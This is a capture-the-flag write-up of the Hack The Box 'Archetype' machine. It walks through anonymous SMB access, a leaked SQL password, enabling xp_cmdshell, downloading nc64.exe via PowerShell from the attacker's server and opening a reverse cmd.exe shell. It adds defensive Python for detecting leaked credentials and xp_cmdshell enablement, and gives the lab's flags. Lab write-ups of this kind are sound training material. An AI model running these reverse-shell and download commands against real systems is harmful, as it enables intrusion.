[HTB] Archetype

This was the first box in Tier 2 of the Starting Point. However, I am pretty sure these boxes are not starter boxes because this one was super hard and I honestly would have not finished it without the walkthrough. Since I couldn’t finish this box myself, there are going to be some missing points here and there throughout this post. I think it’s time for me to start working on the easy boxes from here and maybe come back to the tier 2 boxes later after some time. If I can solve one of those in the future, I will be happy to death and feel so much pride in myself. I believe the day will come very soon.


Which TCP port is hosting a database server?

1433



What is the name of the non-Administrative share available over SMB?

backups



What is the password identified in the file on the SMB share?

M3g4c0rp123

After I figured there was a non-administrative share called backups, I tried to connect to the share by running the following command:

smbclient -N \\\\10.129.95.187\\backups

The -N option is short for ‘No Password’: it attempts a null session, so a share that allows anonymous access is reachable without any credentials.


On the left tmux pane, I connected to the backups share of the SMB server and downloaded the only file, prod.dtsConfig, using the get command. On the right tmux pane, I opened the downloaded file and found the password inside.
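An added example, not part of the original write-up and not the box's own file: a small Python checker that parses an SSIS .dtsConfig in its standard Configuration/ConfiguredValue layout, reports which connection strings embed a cleartext password, and produces a redacted copy. The sample file below is constructed, with a made-up server, user and password. The point of this step, from the defender's side, is that a package configuration sitting on a share readable by a null session is equivalent to publishing the SQL login; the second connection string in the sample shows the alternative, Integrated Security=SSPI, which carries no secret at all.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in the standard SSIS .dtsConfig layout; the server name,
# user and password are made up and are NOT the box's real prod.dtsConfig.
SAMPLE_DTSCONFIG = """\
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="EXAMPLE\\svc_build" GeneratedFromPackageName="Package" GeneratedDate="1/1/2020 12:00:00 AM"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=ExamplePassw0rd;User ID=sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Catalog;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys that carry a secret.
SECRET_KEYS = ("password", "pwd")


@dataclass
class CredentialFinding:
    path: str   # SSIS property path of the offending ConfiguredValue
    user: str   # login the password belongs to (empty if none)
    key: str    # which connection-string key held the secret
    # The secret itself is deliberately not stored: the report must not leak it again.


def parse_connection_string(cs: str) -> Dict[str, str]:
    """Split 'k=v;k=v' into a dict with lower-cased keys; empty segments are ignored."""
    pairs: Dict[str, str] = {}
    for part in cs.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            pairs[k.strip().lower()] = v.strip()
    return pairs


def find_embedded_credentials(xml_text: str) -> List[CredentialFinding]:
    """Report every ConfiguredValue whose connection string carries a cleartext password."""
    root = ET.fromstring(xml_text)
    findings: List[CredentialFinding] = []
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        kv = parse_connection_string(value_el.text)
        for key in SECRET_KEYS:
            if kv.get(key):
                findings.append(CredentialFinding(conf.get("Path", ""), kv.get("user id", ""), key))
    return findings


_SECRET_RE = re.compile(r"(?i)\b(password|pwd)=[^;]*")


def redact_credentials(xml_text: str) -> str:
    """Return a copy of the file with every Password=/Pwd= value replaced by '***',
    suitable for sharing or for checking into source control."""
    root = ET.fromstring(xml_text)
    for value_el in root.iter("ConfiguredValue"):
        if value_el.text:
            value_el.text = _SECRET_RE.sub(r"\1=***", value_el.text)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_DTSCONFIG):
        print(f"cleartext {f.key} for user '{f.user}' in {f.path}")
    print(redact_credentials(SAMPLE_DTSCONFIG))
```

Run over every .dtsConfig found on a share before the share is exposed, and treat any finding as a credential rotation, not just a file cleanup: the password has to be assumed copied by anyone who could read the share.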


What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

mssqlclient.py


But what is Impacket?

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.


We can try to connect to the MSSQL server with Impacket’s mssqlclient.py script and the following flags:

python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth

-windows-auth: this flag is specified to use Windows Authentication

Successfully authenticated to the Microsoft SQL Server

┌──(kali㉿kali)-[~/Desktop/impacket/examples]
└─$ python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth
Impacket v0.12.0.dev1+20240725.125704.9f36a10e - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (ARCHETYPE\sql_svc  dbo@master)>

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

xp_cmdshell



What script can be used in order to search possible paths to escalate privileges on Windows hosts?

winPEAS

The cheatsheet from pentestmonkey was really helpful; that is where I found how to set up command execution through xp_cmdshell.

SQL (ARCHETYPE\sql_svc  dbo@master)> EXEC xp_cmdshell 'net user';
ERROR: Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (ARCHETYPE\sql_svc  dbo@master)> EXEC sp_configure 'show advanced options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc  dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc  dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc  dbo@master)> sp_configure;
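The transcript above is what the enablement looks like from the attacker's client. The same "Configuration option 'xp_cmdshell' changed from 0 to 1" message is also written to the SQL Server ERRORLOG, which is where a defender would catch it. As an added example (not part of the original write-up), here is a Python detector that parses ERRORLOG-style lines and flags every xp_cmdshell enablement, plus the two-step "show advanced options" then "xp_cmdshell" sequence that an interactive session produces. The sample log lines are constructed; their timestamp/spid layout follows the standard ERRORLOG format, but the timestamps and spids themselves are made up.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Iterator, List

# Constructed sample of SQL Server ERRORLOG-style lines (not taken from the box).
# The "Configuration option ... changed from X to Y" text is the message SQL Server
# emits when sp_configure runs; the timestamps and spids here are invented.
SAMPLE_ERRORLOG = """\
2020-02-25 07:36:50.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-02-25 07:36:52.40 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-02-25 07:40:01.03 spid60      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2020-02-25 07:45:10.77 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2020-02-25 07:46:00.00 spid61      Using 'dbghelp.dll' version '4.0.5'
"""

CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


@dataclass
class ConfigChange:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int


def parse_config_changes(lines: Iterable[str]) -> Iterator[ConfigChange]:
    """Yield every sp_configure change recorded in ERRORLOG-style lines; other lines are skipped."""
    for line in lines:
        m = CONFIG_CHANGE_RE.match(line.rstrip("\r\n"))
        if m:
            yield ConfigChange(m["ts"], m["spid"], m["option"], int(m["old"]), int(m["new"]))


def xp_cmdshell_enablements(lines: Iterable[str]) -> List[ConfigChange]:
    """Changes that turned xp_cmdshell on (0 -> non-zero). Each is worth an alert: from
    that moment anyone allowed to call the procedure runs OS commands as the service account."""
    return [c for c in parse_config_changes(lines)
            if c.option == "xp_cmdshell" and c.old == 0 and c.new != 0]


def sessions_with_full_sequence(lines: Iterable[str]) -> List[str]:
    """spids that first flipped 'show advanced options' on and then enabled xp_cmdshell,
    i.e. the interactive sequence rather than a scripted one-off change."""
    advanced_on = set()
    hits: List[str] = []
    for c in parse_config_changes(lines):
        if c.option == "show advanced options" and c.new == 1:
            advanced_on.add(c.spid)
        elif c.option == "xp_cmdshell" and c.new == 1 and c.spid in advanced_on:
            hits.append(c.spid)
    return hits


if __name__ == "__main__":
    log_lines = SAMPLE_ERRORLOG.splitlines()
    for change in xp_cmdshell_enablements(log_lines):
        print(f"ALERT {change.timestamp} {change.spid}: xp_cmdshell enabled")
    print("sessions showing the full enable sequence:", sessions_with_full_sequence(log_lines))
```

The later "changed from 1 to 0" line in the sample is deliberately not an alert: the detector distinguishes enabling from disabling, so an administrator turning the feature back off does not produce noise. Matching on the spid ties the two configuration changes to one session, which is more specific than alerting on either message alone.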

Now I had command execution. Let’s get a stable reverse shell: we will upload the nc64.exe binary to the target machine and have it run an interactive cmd.exe connected back to our listening port.

SQL (ARCHETYPE\sql_svc  dbo@master)> xp_cmdshell "whoami"
output
-----------------
archetype\sql_svc

NULL

Let’s download the binary and navigate to its folder, then start a simple HTTP server, and in a different tab the netcat listener.

python3 -m http.server 80

nc -lvnp 443


As user archetype\sql_svc, we don’t have enough privileges to write files into a system directory; only the Administrator user can perform actions with higher privileges. We need to change the current working directory to somewhere under our user’s home directory where writing is possible.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.14/nc64.exe -outfile nc64.exe"


The HTTP server log confirmed that the target machine performed the request. Let’s bind cmd.exe through nc to our listener.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.14 443"


On the right tmux pane, I caught the reverse shell with netcat.


What file contains the administrator’s password?

ConsoleHost_history.txt
 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,716,418,048 bytes free

C:\Users\sql_svc\Desktop>type user.txt
type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>

On the target machine, I used PowerShell to download the program from my system.


Submit user flag

3e7b102e78218e935bf3f4951fec21a3



Submit root flag

b91ccec3305e98240082d4474b848528


#Hack The Box